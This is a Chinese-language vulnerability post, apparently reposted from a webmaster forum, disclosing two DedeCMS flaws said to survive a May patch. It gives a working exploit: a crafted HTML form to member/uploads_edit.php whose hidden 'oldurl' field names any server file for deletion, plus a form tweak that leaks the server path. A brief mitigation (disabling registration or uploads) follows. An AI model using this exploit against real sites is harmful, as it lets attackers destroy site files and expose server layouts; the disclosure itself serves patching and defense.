仲介交易 HTTP://www.aliyun.com/zixun/aggregation/6858.html">SEO診斷 淘寶客 雲主機 技術大廳
DEDECMS 最新漏洞,可任意刪除檔。 DEDE在五月發佈了最新的補丁。 可是這個補丁並沒有用。 現在將些BUG發佈出來。
1.刪除網站任意檔.
2.顯示對路徑
1.刪除任意檔.
註冊正常使用者... 隨意找個地方上傳個附件就OK.
部分代碼:
<form class="mTB10 mL10 mR10" name="form1" action="HTTP://網站位址/member/uploads_edit.php" method="post" enctype=" multipart/form-data">
<input type="hidden" name="aid" value="28" />
<input type="hidden" name="mediatype" value="1" />
<input type="hidden" name="oldurl" value="要刪除的檔" /> <!--如value="/index.php">
<input type="hidden" name="dopost" value="save" />
<table cellspacing="1" class="submit">
修改完畢後.打開HTML頁.直接點提交.
然後在使用者管理附件裡點擊刪除.
2.爆路徑.
也是利用原來的html代碼..
<td align="right" valign="top">更換附件:</td>
<td><input name="addonfile" type="file" id="addonfile" style="width:300px" /></td>
把type="file"刪除.保存.然後打開.直接點提交.
就可以爆路徑了..
臨時解決方法.:禁止使用者註冊.或禁止使用者發附件
聚站吧|站長資訊交流群 84087572歡迎大家前來交流。
首發:聚站吧|站長資訊HTTP://www.cnjz8.com 如有轉載請保留出處。